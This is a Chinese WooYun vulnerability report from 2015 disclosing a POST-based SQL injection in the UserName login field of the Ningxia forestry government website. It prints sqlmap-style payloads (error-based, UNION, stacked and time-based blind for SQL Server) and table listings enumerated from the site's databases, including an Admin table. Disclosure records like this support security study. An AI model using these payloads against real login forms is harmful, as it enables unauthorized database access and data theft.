当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124661

漏洞标题:中国林业网(宁夏林业网)post型sql注入(政府站信息泄漏)

相关厂商:宁夏林业网

漏洞作者: ShAdow丶

提交时间:2015-07-10 06:44

修复时间:2015-08-28 16:42

公开时间:2015-08-28 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

上次提过了,但是审核没过,也许是只给了数据库出来,没把表列出来,涉及的相关信息还是很多的。

详细说明:

H{AX7W_5EDGFO4(NEC7{}IS.png


Place: POST
Parameter: UserName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: UserName=admin' AND 9534=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(121)+
CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (9534=9534) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(58)+CHAR(101)+CHAR(100)+CHAR(119)+CHAR(58))) AND 'Nsxl'='Nsxl&PWD=sss
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: UserName=admin' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL
, CHAR(58)+CHAR(110)+CHAR(121)+CHAR(103)+CHAR(58)+CHAR(83)+CHAR(117)+CHAR(70)+CH
AR(80)+CHAR(68)+CHAR(66)+CHAR(87)+CHAR(80)+CHAR(106)+CHAR(71)+CHAR(58)+CHAR(101)
+CHAR(100)+CHAR(119)+CHAR(58), NULL, NULL, NULL-- &PWD=sss
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: UserName=admin'; WAITFOR DELAY '0:0:5';--&PWD=sss
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: UserName=admin' WAITFOR DELAY '0:0:5'--&PWD=sss


上次只给了这几个数据库,当时也只到这儿就没深入了。

CUILXZ]360~SH1`R(0T5FET.png


这次继续深入。

Database: Northwind
[32 tables]
+--------------------------------------+
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |
| dbo.Territories |
| dbo.[Alphabetical list of products] |
| dbo.[Category Sales for 1997] |
| dbo.[Current Product List] |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended] |
| dbo.[Order Details Extended] |
| dbo.[Order Subtotals] |
| dbo.[Orders Qry] |
| dbo.[Orders Qry] |
| dbo.[Product Sales for 1997] |
| dbo.[Products Above Average Price] |
| dbo.[Products Above Average Price] |
| dbo.[Products by Category] |
| dbo.[Quarterly Orders] |
| dbo.[Sales Totals by Amount] |
| dbo.[Sales by Category] |
| dbo.[Summary of Sales by Quarter] |
| dbo.[Summary of Sales by Year] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------+


可以看到很多相关的信息。一些年度的销量啊,产品的价格啊以及员工啊,我想到这儿应该就可以证明了这个洞的重要性吧。表的详细内容就不深入了,毕竟政府站

漏洞证明:

以下是其他相对重要库的表

Database: nx_lyt
[32 tables]
+---------------------+
| dbo.Admin |
| dbo.Affiche |
| dbo.Article |
| dbo.ArticleClass |
| dbo.Cities |
| dbo.Counter |
| dbo.Customers |
| dbo.D99_CMD |
| dbo.D99_REG |
| dbo.Depart |
| dbo.Link |
| dbo.Order_Titles |
| dbo.Pop_window |
| dbo.Public_news |
| dbo.Userandip |
| dbo.Vote |
| dbo.WebCount |
| dbo.X_4401 |
| dbo.X_5512 |
| dbo.X_7508 |
| dbo.Zzday |
| dbo.[nxfor.D99_Tmp] |
| dbo.comd_list |
| dbo.dtproperties |
| dbo.form |
| dbo.link_tu |
| dbo.quhua |
| dbo.qushu |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.vote_class |
| dbo.vote_vote |
+---------------------+

这样应该能过了吧,审核大大

修复方案:

过滤

版权声明:转载请注明来源 ShAdow丶@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-14 16:41

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给宁夏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无